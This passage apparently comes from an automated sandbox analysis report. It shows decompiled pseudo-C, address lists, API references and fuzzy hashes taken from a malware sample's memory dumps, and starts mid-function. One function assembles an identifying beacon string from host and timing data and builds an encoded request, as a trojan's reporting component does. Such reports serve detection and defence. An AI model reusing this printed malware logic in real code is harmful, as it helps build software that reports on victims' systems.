										_t89 = _t66 + 0x10;
										E03C4B12B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E03C4B1C7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x03c4afc4
0x03c4afc5
0x03c4afc6
0x03c4afc9
0x03c4afcb
0x03c4afce
0x03c4afcf
0x03c4afd1
0x03c4afd2
0x03c4afd3
0x03c4afd6
0x03c4afe0
0x03c4b091
0x03c4b098
0x03c4b0a1
0x03c4afe6
0x03c4afe6
0x03c4afec
0x03c4aff2
0x03c4aff5
0x03c4aff8
0x03c4affc
0x03c4b001
0x03c4b006
0x03c4b086
0x00000000
0x03c4b008
0x03c4b008
0x03c4b014
0x03c4b016
0x03c4b071
0x03c4b071
0x03c4b077
0x00000000
0x03c4b018
0x03c4b027
0x03c4b029
0x03c4b02a
0x03c4b02b
0x03c4b02e
0x03c4b02e
0x03c4b030
0x00000000
0x03c4b032
0x03c4b032
0x03c4b07c
0x03c4b034
0x03c4b034
0x03c4b038
0x03c4b040
0x03c4b045
0x03c4b04a
0x03c4b056
0x03c4b05e
0x03c4b065
0x03c4b06b
0x03c4b06f
0x00000000
0x03c4b06f
0x03c4b032
0x03c4b030
0x00000000
0x03c4b016
0x03c4b08a
0x03c4b08a
0x03c4b08a
0x03c4b006
0x03c4b0a6
0x03c4b0ad

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 2cfd70fd8a49fd4b93d73b4f7a6b8f934a6374f0cdb2bfe04ac7579a9b2321ee
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 1D2174769042049BCB14EF68C8809A7FBA5FF45350B0A8568DDA6DB245D730FE15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 021BC1C2, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.510206114.00000000021B9000.00000040.00000001.sdmp, Offset: 021B9000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: a39e23f60a3fcf17a34d968f99501e0d8a5b7ca3b2fd33b12545cc2b34fdcfb1
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: DA118E72780100AFDB44DF99DC80EE673EAEF98620B1980A6ED14CB315D775E801CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00421B2E, Relevance: 45.9, APIs: 24, Strings: 2, Instructions: 431COMMON

Download Yara Rule

APIs

__invoke_watson_if_error.LIBCMTD ref: 00421B72
__invoke_watson_if_error.LIBCMTD ref: 00421D93

Part of subcall function 00418FD0: __invoke_watson.LIBCMTD ref: 00418FF1

_wcscat_s.LIBCMTD ref: 00421D8A

Part of subcall function 00426870: __invalid_parameter.LIBCMTD ref: 004268E2

_wcscat_s.LIBCMTD ref: 00421DC2

Part of subcall function 00426870: _memset.LIBCMT ref: 0042694B
Part of subcall function 00426870: __invalid_parameter.LIBCMTD ref: 004269A7

__invoke_watson_if_error.LIBCMTD ref: 00421DCB
__snwprintf_s.LIBCMTD ref: 00421E24

Part of subcall function 004200F0: __vsnprintf_s_l.LIBCMTD ref: 00420112

__invoke_watson_if_oneof.LIBCMTD ref: 00421E5D
_wcscpy_s.LIBCMTD ref: 00421EA2
__invoke_watson_if_error.LIBCMTD ref: 00421EAB
__invoke_watson_if_oneof.LIBCMTD ref: 00421F4E
_wcscpy_s.LIBCMTD ref: 00421F86
__invoke_watson_if_error.LIBCMTD ref: 00421F8F
__itow_s.LIBCMTD ref: 00421B69

Part of subcall function 00426C50: _xtow_s@20.LIBCMTD ref: 00426C7B

__strftime_l.LIBCMTD ref: 00421C29
__invoke_watson_if_oneof.LIBCMTD ref: 00421C62
_wcscpy_s.LIBCMTD ref: 00421CA7
__invoke_watson_if_error.LIBCMTD ref: 00421CB0
_wcscpy_s.LIBCMTD ref: 00421D03
__invoke_watson_if_error.LIBCMTD ref: 00421D0C
__invoke_watson_if_error.LIBCMTD ref: 00421D46

Strings

hhH@, xrefs: 00421D1B
P.K, xrefs: 00421D3C

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __invoke_watson_if_error$_wcscpy_s$__invoke_watson_if_oneof$__invalid_parameter_wcscat_s$__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnprintf_s_l_memset_xtow_s@20
String ID: P.K$hhH@
API String ID: 2137535789-931661389
Opcode ID: 1e18d3ea9fce9eed1a9bee6953870945d07d54ea56bb16bfa5bc9e9d1ee3a29a
Instruction ID: 3e3991898e7e7c12dba7bf9648da36f192c1e0618ec81abd6fdcc2eed041a920
Opcode Fuzzy Hash: 1e18d3ea9fce9eed1a9bee6953870945d07d54ea56bb16bfa5bc9e9d1ee3a29a
Instruction Fuzzy Hash: C902F3B4A40324ABDB20EF51EC46FDF7374AB54705F5044AAF608762D1D7B89A84CF98

Uniqueness

Uniqueness Score: -1.00%

Function 03C45450, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E03C45450(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x3c4d018; // 0xf7ab99a1
				asm("bswap eax");
				_t61 =  *0x3c4d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x3c4d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x3c4d00c; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x3c4d2a8; // 0xcaa5a8
				_t3 = _t64 + 0x3c4e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d163, _t63, _t62, _t61, _t60,  *0x3c4d02c,  *0x3c4d004, _t59);
				_t67 = E03C43288();
				_t68 =  *0x3c4d2a8; // 0xcaa5a8
				_t4 = _t68 + 0x3c4e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E03C4831C(_t134);
				_t133 = __imp__; // 0x74e05520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x3c4d2a8; // 0xcaa5a8
					_t7 = _t126 + 0x3c4e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x3c4d238, 0, _v8);
				}
				_t73 = E03C49267();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x3c4d2a8; // 0xcaa5a8
					_t11 = _t121 + 0x3c4e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x3c4d238, 0, _v8);
				}
				_t146 =  *0x3c4d32c; // 0x48f95b0
				_t75 = E03C4284E(0x3c4d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x3c4d238, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x3c4d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x3c4d238, _t152, _v20);
						goto L26;
					}
					E03C43239(GetTickCount());
					_t82 =  *0x3c4d32c; // 0x48f95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x3c4d32c; // 0x48f95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x3c4d32c; // 0x48f95b0
					_t148 = E03C47B8D(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x3c4d238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x3c4c28c);
					_push(_t148);
					_t94 = E03C4A677();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x3c4d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E03C47B3B( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E03C45433();
						L22:
						HeapFree( *0x3c4d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E03C49F33(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E03C4137B(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E03C48B22(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E03C47953(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E03C48B22(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x03c45450
0x03c45450
0x03c45450
0x03c45459
0x03c45462
0x03c45464
0x03c45464
0x03c45471
0x03c4547c
0x03c4547f
0x03c45484
0x03c4548d
0x03c45490
0x03c45495
0x03c45498
0x03c4549d
0x03c454a0
0x03c454ac
0x03c454b9
0x03c454bb
0x03c454c1
0x03c454c6
0x03c454d1
0x03c454d3
0x03c454d6
0x03c454d8
0x03c454dd
0x03c454e3
0x03c454e8
0x03c454eb
0x03c454f0
0x03c454fd
0x03c454ff
0x03c45505
0x03c4550f
0x03c4550f
0x03c45511
0x03c45516
0x03c4551b
0x03c4551e
0x03c45523
0x03c45530
0x03c45532
0x03c45540
0x03c45540
0x03c45542
0x03c45550
0x03c45555
0x03c45557
0x03c4555c
0x03c4571d
0x03c45727
0x03c45730
0x03c45562
0x03c4556e
0x03c45574
0x03c45579
0x03c45711
0x03c4571b
0x00000000
0x03c4571b
0x03c45585
0x03c4558a
0x03c45593
0x03c455a4
0x03c455a8
0x03c455b1
0x03c455b7
0x03c455c6
0x03c455cd
0x03c455d6
0x03c455dc
0x03c45705
0x03c4570f
0x00000000
0x03c4570f
0x03c455e8
0x03c455ee
0x03c455ef
0x03c455f4
0x03c455f9
0x03c456fb
0x03c45703
0x00000000
0x03c45703
0x03c45602
0x03c45609
0x03c45611
0x03c45616
0x03c4561f
0x03c4562a
0x03c4562f
0x03c45634
0x03c45733
0x03c456e7
0x03c456e7
0x03c456ec
0x03c456f7
0x03c456f9
0x00000000
0x03c456f9
0x03c4563e
0x03c45643
0x03c45648
0x03c4564d
0x03c4565d
0x03c45660
0x03c45666
0x03c4566c
0x03c45672
0x03c45675
0x03c4567b
0x03c4567e
0x03c45683
0x03c45687
0x03c45687
0x03c45693
0x03c4569f
0x03c456a3
0x03c456a5
0x03c456aa
0x03c456ac
0x03c456b1
0x03c456b6
0x03c456c3
0x03c456cb
0x03c456ce
0x03c456ce
0x03c456aa
0x00000000
0x03c45695
0x03c45699
0x03c456d0
0x03c456d3
0x03c456dc
0x00000000
0x00000000
0x00000000
0x00000000
0x03c456dc
0x03c4569b
0x00000000
0x03c4569b
0x03c45693

APIs

GetTickCount.KERNEL32 ref: 03C45464
wsprintfA.USER32 ref: 03C454B4
wsprintfA.USER32 ref: 03C454D1
wsprintfA.USER32 ref: 03C454FD
HeapFree.KERNEL32(00000000,?), ref: 03C4550F
wsprintfA.USER32 ref: 03C45530
HeapFree.KERNEL32(00000000,?), ref: 03C45540
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03C4556E
GetTickCount.KERNEL32 ref: 03C4557F
RtlEnterCriticalSection.NTDLL(048F9570), ref: 03C45593
RtlLeaveCriticalSection.NTDLL(048F9570), ref: 03C455B1

Part of subcall function 03C47B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,03C49DA0,?,048F95B0), ref: 03C47BB8
Part of subcall function 03C47B8D: lstrlen.KERNEL32(?,?,?,03C49DA0,?,048F95B0), ref: 03C47BC0
Part of subcall function 03C47B8D: strcpy.NTDLL ref: 03C47BD7
Part of subcall function 03C47B8D: lstrcat.KERNEL32(00000000,?), ref: 03C47BE2
Part of subcall function 03C47B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,03C49DA0,?,048F95B0), ref: 03C47BFF

StrTrimA.SHLWAPI(00000000,03C4C28C,?,048F95B0), ref: 03C455E8

Part of subcall function 03C4A677: lstrlen.KERNEL32(048F9BF8,00000000,00000000,7691C740,03C49DCB,00000000), ref: 03C4A687
Part of subcall function 03C4A677: lstrlen.KERNEL32(?), ref: 03C4A68F
Part of subcall function 03C4A677: lstrcpy.KERNEL32(00000000,048F9BF8), ref: 03C4A6A3
Part of subcall function 03C4A677: lstrcat.KERNEL32(00000000,?), ref: 03C4A6AE

lstrcpy.KERNEL32(00000000,?), ref: 03C45609
lstrcpy.KERNEL32(?,?), ref: 03C45611
lstrcat.KERNEL32(?,?), ref: 03C4561F
lstrcat.KERNEL32(?,00000000), ref: 03C45625

Part of subcall function 03C47B3B: lstrlen.KERNEL32(?,00000000,048F9C18,00000000,03C45142,048F9E3B,?,?,?,?,?,69B25F44,00000005,03C4D00C), ref: 03C47B42
Part of subcall function 03C47B3B: mbstowcs.NTDLL ref: 03C47B6B
Part of subcall function 03C47B3B: memset.NTDLL ref: 03C47B7D

wcstombs.NTDLL ref: 03C456B6

Part of subcall function 03C4137B: SysAllocString.OLEAUT32(?), ref: 03C413B6

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

HeapFree.KERNEL32(00000000,?,?), ref: 03C456F7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03C45703
HeapFree.KERNEL32(00000000,?,?,048F95B0), ref: 03C4570F
HeapFree.KERNEL32(00000000,?), ref: 03C4571B
HeapFree.KERNEL32(00000000,?), ref: 03C45727

Strings

Ut, xrefs: 03C454DD

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID: Ut
API String ID: 3748877296-8415677
Opcode ID: 8278575820984f82d5cfa51b9a5204f8a8120e252ec473b45d5e9ad0aad45b22
Instruction ID: d146a4bdf3b89a16e6f6afab74f56f9297b478bc854c2be01b6255fdb1dc5c27
Opcode Fuzzy Hash: 8278575820984f82d5cfa51b9a5204f8a8120e252ec473b45d5e9ad0aad45b22
Instruction Fuzzy Hash: E8913A79900218AFCB11FFA5DC88AAEBBB9EF09350F154454F406DB261DB31ED51DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0042A9D3, Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 368COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042AA62
_get_int64_arg.LIBCMTD ref: 0042AA8A
__aullrem.LIBCMT ref: 0042AC2F
__aulldiv.LIBCMT ref: 0042AC51
_write_multi_char.LIBCMTD ref: 0042AD58
_write_string.LIBCMTD ref: 0042AD73
_write_multi_char.LIBCMTD ref: 0042AD9F
_wctomb_s.LIBCMTD ref: 0042AE1C

Strings

9, xrefs: 0042AC62
-, xrefs: 0042ACF8

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
String ID: -$9
API String ID: 3451365851-1631151375
Opcode ID: 1fc5a0482b8821cd248c39767216ebda26ae30c8c4b31847ec946087964c5271
Instruction ID: 2bc872e2dee89f40275088cd710adbfe0b7c2683daf52de0633da1855cf46d20
Opcode Fuzzy Hash: 1fc5a0482b8821cd248c39767216ebda26ae30c8c4b31847ec946087964c5271
Instruction Fuzzy Hash: 3BF13971E012298FDB24CF58DC99BAEB7B1BB44304F5481DAD909A7241D7385E90CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042C615, Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 365COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C6AA
_get_int64_arg.LIBCMTD ref: 0042C6D2
__aullrem.LIBCMT ref: 0042C87A
__aulldiv.LIBCMT ref: 0042C89C
_write_multi_char.LIBCMTD ref: 0042C9B5
_write_string.LIBCMTD ref: 0042C9D0
_write_multi_char.LIBCMTD ref: 0042C9FC
__mbtowc_l.LIBCMTD ref: 0042CA6B

Strings

9, xrefs: 0042C8AD

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
String ID: 9
API String ID: 3455034128-2366072709
Opcode ID: 0950f958f3d374ab83d8d7c2758e217248dfc27327937c7116b8662658d9e261
Instruction ID: 2d1ac947ce9844c9179fbbacbc49c037d939956877c889e7b7ea35789d10b65f
Opcode Fuzzy Hash: 0950f958f3d374ab83d8d7c2758e217248dfc27327937c7116b8662658d9e261
Instruction Fuzzy Hash: ABF15AB1E002299FDB24CF54EC81BAEB7B1FF85304F54819AE649A7241D7386E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004270C3, Relevance: 25.8, APIs: 17, Instructions: 319COMMON

Download Yara Rule

APIs

_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042710B
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427141
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427162
wcsncnt.LIBCMTD ref: 00427199
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004271FF
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427450

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale$UpdateUpdate::~_$wcsncnt
String ID:
API String ID: 986326057-0
Opcode ID: 9cef7c6418950de02ba52dd9b8644c042146a359fcaee8655cf2372a5d576614
Instruction ID: 79eaf3e4bb75805f87f09c847be8a28046ce297e10f286829109507b70c0bcb6
Opcode Fuzzy Hash: 9cef7c6418950de02ba52dd9b8644c042146a359fcaee8655cf2372a5d576614
Instruction Fuzzy Hash: 1FE16B30A04128DFCB14DF94D984BEEB7B1FF59314F60825AE8116B2A1D738AE41DF95

Uniqueness

Uniqueness Score: -1.00%

Function 0042A737, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042A73B
__get_printf_count_output.LIBCMTD ref: 0042A749
__invalid_parameter.LIBCMTD ref: 0042A7D0
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042A7E5
_write_multi_char.LIBCMTD ref: 0042AD58
_write_string.LIBCMTD ref: 0042AD73
_write_multi_char.LIBCMTD ref: 0042AD9F
_wctomb_s.LIBCMTD ref: 0042AE1C

Strings

-, xrefs: 0042ACF8

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter_get_int_arg_wctomb_s_write_string
String ID: -
API String ID: 2357813345-2547889144
Opcode ID: acc440d41bdeade629de7e3922000c08c29de41326dbf19b06d532a9b5056aef
Instruction ID: c591ac5b46546d929382d15e2e3ff357b8f5cebbccc3cbb671df1495b2b8966f
Opcode Fuzzy Hash: acc440d41bdeade629de7e3922000c08c29de41326dbf19b06d532a9b5056aef
Instruction Fuzzy Hash: A1A17E70A002299BDB24DF55DC49BEEB7B1EB44304F5481DAE8097B281D7789EE0CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A585, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042A589
_strlen.LIBCMT ref: 0042A5B9
_write_multi_char.LIBCMTD ref: 0042AD58
_write_string.LIBCMTD ref: 0042AD73
_write_multi_char.LIBCMTD ref: 0042AD9F
_wctomb_s.LIBCMTD ref: 0042AE1C

Strings

t^@, xrefs: 0042A5AC
-, xrefs: 0042ACF8

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s_write_string
String ID: -$t^@
API String ID: 2232461714-3510621447
Opcode ID: 941dc0f34b879b2f82b8ad89c42daa98c76114a8c0c6de3cad7ddf51d4b91dde
Instruction ID: 4d1a2725863da18c144da86bd54794889d6bfacca40f2bd64692e54bdc3f0503
Opcode Fuzzy Hash: 941dc0f34b879b2f82b8ad89c42daa98c76114a8c0c6de3cad7ddf51d4b91dde
Instruction Fuzzy Hash: A9A18C74E01228CFDB64CF54DC89BEEB7B1AB48305F5481DAD8096B281D7789E90CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042C1A4, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 222COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042C1A8
_strlen.LIBCMT ref: 0042C1D8
_write_multi_char.LIBCMTD ref: 0042C9B5
_write_string.LIBCMTD ref: 0042C9D0
_write_multi_char.LIBCMTD ref: 0042C9FC
__mbtowc_l.LIBCMTD ref: 0042CA6B

Strings

t^@, xrefs: 0042C1CB

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
String ID: t^@
API String ID: 909868375-4267518164
Opcode ID: 6a25aa852a63cb297ba3967a9a4b8c430dc48fb6e23364fbb8b6d4fc3e139a69
Instruction ID: d6a8ef80ef49d9fb4d2241f79d7045db29c5a88ff4313da9607b93f5fb2ad9a3
Opcode Fuzzy Hash: 6a25aa852a63cb297ba3967a9a4b8c430dc48fb6e23364fbb8b6d4fc3e139a69
Instruction Fuzzy Hash: 36A160B5E00228DBDB24CF55DC81BEEB7B5EB44304F54819AE50A67282D738AE84CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0042C37A, Relevance: 16.7, APIs: 11, Instructions: 238COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042C37E
__get_printf_count_output.LIBCMTD ref: 0042C38C
__invalid_parameter.LIBCMTD ref: 0042C413
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042C428
_write_multi_char.LIBCMTD ref: 0042C9B5
_write_string.LIBCMTD ref: 0042C9D0
_write_multi_char.LIBCMTD ref: 0042C9FC
__mbtowc_l.LIBCMTD ref: 0042CA6B

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter__mbtowc_l_get_int_arg_write_string
String ID:
API String ID: 2386203720-0
Opcode ID: 98061ba334744be99878acdba2fc05ce670ed5434f0004ad89ccbef606bcabaf
Instruction ID: c49ab5b4cc4d571a5c8abe6775617a1c8a0846bdcac9e59270abf1c03f28b5b2
Opcode Fuzzy Hash: 98061ba334744be99878acdba2fc05ce670ed5434f0004ad89ccbef606bcabaf
Instruction Fuzzy Hash: A4A190B5A00229CBDB24DF45DC85BEEB774EB44304F54809AE60A6B282D7786EC4CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 03C48F85, Relevance: 16.6, APIs: 11, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E03C48F85(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				WCHAR* _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				WCHAR* _t91;

				_t79 =  *0x3c4d33c; // 0x48f9798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E03C49B1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x3c4c18c;
				}
				_t46 = E03C47F8B(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E03C41525(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x3c4d2a8; // 0xcaa5a8
						_t16 = _t75 + 0x3c4eb08; // 0x530025
						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E03C49B1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x3c4c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E03C41525(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E03C48B22(_v20);
						} else {
							_t66 =  *0x3c4d2a8; // 0xcaa5a8
							_t31 = _t66 + 0x3c4ec28; // 0x73006d
							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E03C48B22(_v12);
				}
				return _v24;
			}

0x03c48f8d
0x03c48f93
0x03c48f9a
0x03c48fa0
0x03c48fa4
0x03c48fa8
0x03c48fab
0x03c48fb0
0x03c48fb5
0x03c48fb7
0x03c48fb7
0x03c48fc0
0x03c48fc5
0x03c48fca
0x03c48fd0
0x03c48fda
0x03c48fe3
0x03c48fea
0x03c49003
0x03c49008
0x03c4900d
0x03c49016
0x03c4901f
0x03c49030
0x03c49039
0x03c4903d
0x03c49041
0x03c49046
0x03c4904b
0x03c4904d
